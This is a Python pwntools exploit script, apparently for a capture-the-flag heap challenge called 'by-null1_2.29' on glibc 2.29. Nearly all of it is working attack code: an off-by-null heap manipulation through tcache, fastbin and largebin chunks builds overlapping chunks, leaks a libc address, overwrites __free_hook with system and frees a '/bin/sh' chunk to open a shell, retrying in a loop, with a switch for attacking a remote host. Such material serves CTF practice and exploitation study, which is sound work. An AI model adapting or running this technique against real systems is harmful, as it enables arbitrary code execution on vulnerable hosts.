        log.success('The '+str(name)+' Addr:' + str(hex(addr)))


#host = 1.1.1.1
#port = 10000
local = 1
if local:
    #context.log_level = 'debug'
    libc=ELF('/glibc/x64/2.29/lib/libc-2.29.so')
    sh = process('./by-null1_2.29')
else:
    #context.log_level = 'debug'
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    sh = remote('host','port')


def pwn():
#step1
    for i in range(7):
        add(i,0x20)
    add(7,0x6980-0x30*7)
#step2
    add(7,0x4f0) #A for large chunk
    add(8,0x10)  #for block top
#step3
    delete(7)
    add(8,0x5f0) #larger than all the free chunks to cause A put into largebins
    #gdb.attach(sh)
#step4,5
    for i in range(3):
        add(7+i,0x20) #for B,C,and a block
    add(9,0x20)         #D hebind the block 
    #gdb.attach(sh)
    edit(7,p64(0)+p64(0xf1)+'\x30',0)  #fake B
#step6    
    for i in range(7):
        delete(i)   #for full the tcache
    add(0,0x10)     #for block D and A
    #gdb.attach(sh)
    #D first freed so after a big malloc,in smallbins C->bk = D
    delete(9)          
    delete(8)

    add(0,0x500)     #triger for travel


#step7
    for i in range(7):
        add(i,0x20) #use all of tcache chunk
    add(8,0x20)        #C
    add(9,0x20)        #D
    edit(8,p64(0)+'\x10',0)  #change C->bk == fake_B
#step8
    for i in range(7):
        delete(i)    #fill the tcache again this time for fastbin_chunk chain
    delete(9)         #into fastbin
    delete(7)        #into fastbin and B->fd == C

#step9
    for i in range(7):
        add(i,0x20)
    add(7,0x20)        #B include it`s fake_B
    add(9,0x20)        #D
    edit(7,'\x10',0)#cover B->fd == fake_B
    add(1,0x18)        #for prev_size and off-by-null the next chunk
    add(0,0xf0)     #the next chunk 
    edit(1,p64(0)*2 +p64(0xf0),0) #prev_size and off-by-null
    #gdb.attach(sh)    
#step10
    for i in range(7):
        add(i+1,0xf0)
    for i in range(7):
        delete(i+1) #fill the 0x100 tcache
#step11 
    delete(0)        #overlapping 
#get shell
    add(0,0x10)
    show(8)
    libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x3b3ca0
    show_addr('libc_addr',libc_addr)
    free_hook = libc_addr + libc.sym['__free_hook']
    show_addr('free_hook',free_hook)
    system_addr = libc_addr + libc.sym['system']
    show_addr('system_addr',system_addr)

    add(1,0x20)
    delete(8)
    edit(1,p64(free_hook),0)
    add(2,0x20)
    edit(2,"/bin/sh\x00",1)
    add(3,0x20)
    edit(3,p64(system_addr),0)
    delete(2)

if __name__ == '__main__':
    while 1:
        try:
            sh = process('./by-null1_2.29')
            pwn()
            sh.interactive()
        except:
            sh.close()